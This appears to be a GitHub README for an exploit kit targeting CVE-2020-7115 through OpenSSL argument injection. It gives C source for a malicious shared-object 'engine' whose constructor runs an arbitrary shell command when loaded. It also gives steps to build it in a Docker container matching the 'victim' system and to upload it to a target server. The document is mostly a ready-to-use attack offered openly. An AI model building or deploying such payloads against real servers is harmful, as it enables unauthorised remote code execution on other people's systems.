Retr02332/CVE-2020-7115

CVE-2020-7115

Create your malicious engine in seconds

build_engine.sh

A simple script that generates a malicious OpenSSL engine (a shared object) ready to be used in openssl argument injection scenarios.

How to use?

It's very simple: just edit the engine.c file and replace COMMAND with the command of your choice:

#include <unistd.h>
#include <stddef.h>

/* The constructor attribute makes init() run as soon as the shared
 * object is loaded (dlopen), i.e. when openssl loads it as an engine,
 * so no engine API entry points are needed. */
__attribute__((constructor))
static void init(void) {
    /* execl() takes a variadic argument list that must end with a NULL sentinel. */
    execl("/bin/sh", "sh", "-c", "COMMAND", (char *)NULL);
}

Once you have done that, you just need to run the script like this:

bash build_engine.sh

This command creates a folder called output; in it you will find a file called engine.so, which is the one you should send to the server through a file upload functionality.

How to bring up a Docker container to run the script, and why should I do it?

It is important to know that you must build the malicious engine on a system with the same characteristics as the victim system. That is, if the target system is running on 64-bit Linux, you must build the malicious engine on 64-bit Linux.

Docker is a great fit for this kind of thing, and setting up your environment is very easy.

First, let's download the Docker image for a 64-bit Debian Linux system:

sudo docker pull debian

Then we start the container as follows:

sudo docker run -v `pwd`:/code -it debian

Let's look at what we did here. The -v flag creates a volume: in this case we are mapping the /code folder inside the container to our current directory on the host, hence the use of pwd.

By mapping I mean that everything we create or edit in /code (a folder hosted at the root of the container's filesystem) will also appear in pwd on the host, and vice versa.

In our case, pwd points to the following directory on our local machine:

/home/retr0/CVE-2020-7115/

The -it flag, on the other hand, can be understood as follows:

The -t (--tty) flag tells Docker to allocate a pseudo-terminal inside the container. It is commonly used together with the -i (--interactive) option, which keeps STDIN open even when the container is not attached.

So, in effect, the -it flag is what we want when we need an interactive shell in the container.

Don't know CVE-2020-7115?

No problem, just visit this post, and I am sure you will fully understand the vulnerability.
